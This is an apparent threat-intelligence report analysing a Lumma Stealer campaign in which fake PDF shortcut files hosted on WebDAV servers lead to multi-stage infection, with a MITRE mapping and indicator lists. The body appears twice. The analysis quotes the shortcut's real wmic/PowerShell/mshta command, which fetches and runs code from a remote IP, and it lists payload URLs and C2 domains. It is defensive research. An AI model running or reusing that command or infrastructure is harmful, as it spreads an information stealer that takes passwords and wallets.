Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions' Infrastructure

The Lumma Stealer malware campaign is exploiting compromised educational institutions to distribute malicious LNK files disguised as PDFs, targeting industries like finance, healthcare, technology, and media. Once executed, these files initiate a stealthy multi-stage infection process, allowing cybercriminals to steal passwords, browser data, and cryptocurrency wallets. With sophisticated evasion techniques, including using Steam profiles for command-and-control operations, this malware-as-a-service (MaaS) threat highlights the urgent need for robust cybersecurity defenses. Stay vigilant against deceptive phishing tactics to protect sensitive information from cyber exploitation.

Mayank Sahariya
February 14, 2025
Green Alert
Last Update posted on
February 14, 2025
Proactive Monitoring of the Dark Web for your organization.

Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.

Schedule a Demo
Table of Contents
Author(s)
No items found.

Executive Summary

Lumma Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It is designed to steal sensitive data, including passwords, browser information, and cryptocurrency wallet details.

This report details an ongoing malware campaign distributing the Lumma Stealer information stealer. The campaign's primary infection vector involves using malicious LNK (shortcut) files that are crafted to appear as legitimate PDF documents. These LNK files, when executed, initiate a multi-stage infection process ultimately leading to the deployment of Lumma Stealer on the victim's machine. The campaign focuses on tricking users into executing malicious files, highlighting the importance of user awareness and robust security measures. Malware campaign targets multiple industries, including Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.

Previously, we published two in-depth research reports analyzing the Lumma Stealer campaign, detailing its tactics, techniques, and procedures (TTPs) used by threat actors to distribute and deploy the malware.

mind map of the campaign

Attribution and Analysis

During a drive-by compromise, the user is initially redirected to a WebDAV server while visiting certain websites, unknowingly establishing a connection. This redirection may trigger an explorer.exe window preview, displaying the contents of the WebDAV server, which hosts malicious files designed to exploit system vulnerabilities or deliver malware. 

In the analyzed infrastructure, malicious files were hosted on a WebDAV server within the open directory “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, When a user clicks to download the school fee structure, they unknowingly download a malicious "pdf.lnk" file, which appears as a PDF due to its icon.

Users click on the PDF to download

The directory primarily contained “.lnk” file, which were weaponized to download additional malicious payloads using “mshta.exe”, a legitimate Microsoft executable designed to run Microsoft HTML Application (HTA) files.

LNK (shortcut) files are often leveraged as an entry point in phishing campaigns. By exploiting their unique features, threat actors can deceive users and bypass security measures, making them effective tools for infiltrating systems and networks.

The LNK file runs a PowerShell command that connects to a remote server, triggering the next stage of the attack. “C:\Windows\System32\Wbem\wmic.exe process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"

Powershell script in Lnk file

These deceptive shortcuts, often camouflaged as legitimate executables or PDF files, entice unsuspecting users to click, ultimately compromising their systems or networks.

We extracted the script by dumping the overlay section, revealing an obfuscated JavaScript code. 

Script in overlay

Obfuscated JavaScript code in overlay section of Samarik

Java Script in Overlay Section

This function evaluates the JavaScript code stored in the variable aeQ. The use of eval is a common technique in obfuscated or malicious scripts.

Mshta Executes the Java Script

A PowerShell script can be seen through the obfuscated JS script. An AES-encrypted payload and a procedure to decrypt it in CBC mode using a hardcoded decryption key are included in this PowerShell script. Simple mathematical obfuscation techniques are also used in the script. 

Encrypted Powershell Script

The PowerShell script's normalized variables and functions show how the payload is downloaded and executed.

Decrypted and Normalized PS Script

The final PowerShell script downloads extract the contents and execute “Kompass-4.1.2.exe” (Lumma Stealer) from https[:]//80.76.51[.]231/Kompass-4.1.2.exe

Lumma Stealer attempts to connect with command and control (C2) servers to exfiltrate stolen data after infecting a system. It tries to reach multiple C2 server domains; however, these servers are currently inaccessible.

Malware communicates with c2’s and steamcommunity

The sample uses the Steam connection if it cannot access every C2 domain it owns. Steam URLs differ from C2 domains in that they have distinct decryption techniques and are stored as execution codes.

hxxps://steamcommunity.com/profiles/76561199724331900

The number 76561199724331900 follows the format of a Steam64 ID, suggesting that a Steam client or game might be attempting to resolve a network service. This indicates that a device on the network is trying to resolve a name (likely related to a Steam session or game server). The profile was created on June 28, 2024.

C2 cloaking via Steam profiles is a sophisticated evasion technique that abuses a trusted platform for stealthy command & control communication.

Steam Profile Account “76561199724331900”

The threat actor most likely constructed this Steam URL, which is a profile page for a Steam account. The sample first connects to the website, parses the "actual_persona_name" tag to extract strings, and then uses the Caesar cipher method to decrypt the strings and extract C2 domains. 

HTML class of steam

Based on analyzing different names mimicking legitimate PDF documents (e.g., contracts, financial reports, academic materials, and technical brochures), Lumma Stealer malware targets industries including but not limited to Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.

Different names mimicking legitimate PDF documents

MITRE ATT&CK Tactics and Techniques:

Tactic Technique
Execution (TA0002) T1059 – Command and Scripting Interpreter: PowerShell
T1204.002 – User Execution: Malicious File
T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003) T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004) T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005) T1027 – Obfuscated Files or Information
T1036.003 – Masquerading: Rename System Utilities
T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006) T1012 – Query Registry
Discovery (TA0007) T1082 – System Information Discovery
Lateral Movement (TA0008) T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009) T1114 – Email Collection
T1560 – Archive Collected Data
Command and Control (TA0011) T1071 – Application Layer Protocol
Exfiltration (TA0010) T1041 – Exfiltration Over C2 Channel
Impact (TA0040) T1489 – Service Stop
T1490 – Inhibit System Recovery

Indicators of Compromise (IoCs):

Hash's (sha256) File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 Samarik
URL Category
tripeggyun.fun Domain
processhol.sbs Domain
librari-night.sbs Domain
befall-sm0ker.sbs Domain
p10tgrace.sbs Domain
peepburry828.sbs Domain
owner-vacat10n.sbs Domain
3xp3cts1aim.sbs Domain
p3ar11fter.sbs Domain
smiteattacker.org Decrypted Steam C2 Domains
yuriy-gagarin.com Decrypted Steam C2 Domains
vladimir-ulyanov.com Decrypted Steam C2 Domains
nikolay-romanov.su Decrypted Steam C2 Domains
aleksandr-block.com Decrypted Steam C2 Domains
misha-lomonosov.com Decrypted Steam C2 Domains
sputnik-1985.com Decrypted Steam C2 Domains
lev-tolstoi.com Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe Remote C2 URL
https[:]//80.76.51.231/Samarik Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk WebDAV Servers (Lnk hosted)
IPv4 Category
87.120.115.240 IP
80.76.51.231 IP

References

Predict Cyber threats against your organization

Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

Malware Intelligence

6

min read

Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions' Infrastructure

The Lumma Stealer malware campaign is exploiting compromised educational institutions to distribute malicious LNK files disguised as PDFs, targeting industries like finance, healthcare, technology, and media. Once executed, these files initiate a stealthy multi-stage infection process, allowing cybercriminals to steal passwords, browser data, and cryptocurrency wallets. With sophisticated evasion techniques, including using Steam profiles for command-and-control operations, this malware-as-a-service (MaaS) threat highlights the urgent need for robust cybersecurity defenses. Stay vigilant against deceptive phishing tactics to protect sensitive information from cyber exploitation.

Authors
Mayank Sahariya
Co-Authors
No items found.

Executive Summary

Lumma Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It is designed to steal sensitive data, including passwords, browser information, and cryptocurrency wallet details.

This report details an ongoing malware campaign distributing the Lumma Stealer information stealer. The campaign's primary infection vector involves using malicious LNK (shortcut) files that are crafted to appear as legitimate PDF documents. These LNK files, when executed, initiate a multi-stage infection process ultimately leading to the deployment of Lumma Stealer on the victim's machine. The campaign focuses on tricking users into executing malicious files, highlighting the importance of user awareness and robust security measures. Malware campaign targets multiple industries, including Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.

Previously, we published two in-depth research reports analyzing the Lumma Stealer campaign, detailing its tactics, techniques, and procedures (TTPs) used by threat actors to distribute and deploy the malware.

mind map of the campaign

Attribution and Analysis

During a drive-by compromise, the user is initially redirected to a WebDAV server while visiting certain websites, unknowingly establishing a connection. This redirection may trigger an explorer.exe window preview, displaying the contents of the WebDAV server, which hosts malicious files designed to exploit system vulnerabilities or deliver malware. 

In the analyzed infrastructure, malicious files were hosted on a WebDAV server within the open directory “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”, When a user clicks to download the school fee structure, they unknowingly download a malicious "pdf.lnk" file, which appears as a PDF due to its icon.

Users click on the PDF to download

The directory primarily contained “.lnk” file, which were weaponized to download additional malicious payloads using “mshta.exe”, a legitimate Microsoft executable designed to run Microsoft HTML Application (HTA) files.

LNK (shortcut) files are often leveraged as an entry point in phishing campaigns. By exploiting their unique features, threat actors can deceive users and bypass security measures, making them effective tools for infiltrating systems and networks.

The LNK file runs a PowerShell command that connects to a remote server, triggering the next stage of the attack. “C:\Windows\System32\Wbem\wmic.exe process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"

Powershell script in Lnk file

These deceptive shortcuts, often camouflaged as legitimate executables or PDF files, entice unsuspecting users to click, ultimately compromising their systems or networks.

We extracted the script by dumping the overlay section, revealing an obfuscated JavaScript code. 

Script in overlay

Obfuscated JavaScript code in overlay section of Samarik

Java Script in Overlay Section

This function evaluates the JavaScript code stored in the variable aeQ. The use of eval is a common technique in obfuscated or malicious scripts.

Mshta Executes the Java Script

A PowerShell script can be seen through the obfuscated JS script. An AES-encrypted payload and a procedure to decrypt it in CBC mode using a hardcoded decryption key are included in this PowerShell script. Simple mathematical obfuscation techniques are also used in the script. 

Encrypted Powershell Script

The PowerShell script's normalized variables and functions show how the payload is downloaded and executed.

Decrypted and Normalized PS Script

The final PowerShell script downloads extract the contents and execute “Kompass-4.1.2.exe” (Lumma Stealer) from https[:]//80.76.51[.]231/Kompass-4.1.2.exe

Lumma Stealer attempts to connect with command and control (C2) servers to exfiltrate stolen data after infecting a system. It tries to reach multiple C2 server domains; however, these servers are currently inaccessible.

Malware communicates with c2’s and steamcommunity

The sample uses the Steam connection if it cannot access every C2 domain it owns. Steam URLs differ from C2 domains in that they have distinct decryption techniques and are stored as execution codes.

hxxps://steamcommunity.com/profiles/76561199724331900

The number 76561199724331900 follows the format of a Steam64 ID, suggesting that a Steam client or game might be attempting to resolve a network service. This indicates that a device on the network is trying to resolve a name (likely related to a Steam session or game server). The profile was created on June 28, 2024.

C2 cloaking via Steam profiles is a sophisticated evasion technique that abuses a trusted platform for stealthy command & control communication.

Steam Profile Account “76561199724331900”

The threat actor most likely constructed this Steam URL, which is a profile page for a Steam account. The sample first connects to the website, parses the "actual_persona_name" tag to extract strings, and then uses the Caesar cipher method to decrypt the strings and extract C2 domains. 

HTML class of steam

Based on analyzing different names mimicking legitimate PDF documents (e.g., contracts, financial reports, academic materials, and technical brochures), Lumma Stealer malware targets industries including but not limited to Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.

Different names mimicking legitimate PDF documents

MITRE ATT&CK Tactics and Techniques:

Tactic Technique
Execution (TA0002) T1059 – Command and Scripting Interpreter: PowerShell
T1204.002 – User Execution: Malicious File
T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003) T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004) T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005) T1027 – Obfuscated Files or Information
T1036.003 – Masquerading: Rename System Utilities
T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006) T1012 – Query Registry
Discovery (TA0007) T1082 – System Information Discovery
Lateral Movement (TA0008) T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009) T1114 – Email Collection
T1560 – Archive Collected Data
Command and Control (TA0011) T1071 – Application Layer Protocol
Exfiltration (TA0010) T1041 – Exfiltration Over C2 Channel
Impact (TA0040) T1489 – Service Stop
T1490 – Inhibit System Recovery

Indicators of Compromise (IoCs):

Hash's (sha256) File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 Samarik
URL Category
tripeggyun.fun Domain
processhol.sbs Domain
librari-night.sbs Domain
befall-sm0ker.sbs Domain
p10tgrace.sbs Domain
peepburry828.sbs Domain
owner-vacat10n.sbs Domain
3xp3cts1aim.sbs Domain
p3ar11fter.sbs Domain
smiteattacker.org Decrypted Steam C2 Domains
yuriy-gagarin.com Decrypted Steam C2 Domains
vladimir-ulyanov.com Decrypted Steam C2 Domains
nikolay-romanov.su Decrypted Steam C2 Domains
aleksandr-block.com Decrypted Steam C2 Domains
misha-lomonosov.com Decrypted Steam C2 Domains
sputnik-1985.com Decrypted Steam C2 Domains
lev-tolstoi.com Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe Remote C2 URL
https[:]//80.76.51.231/Samarik Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk WebDAV Servers (Lnk hosted)
IPv4 Category
87.120.115.240 IP
80.76.51.231 IP

References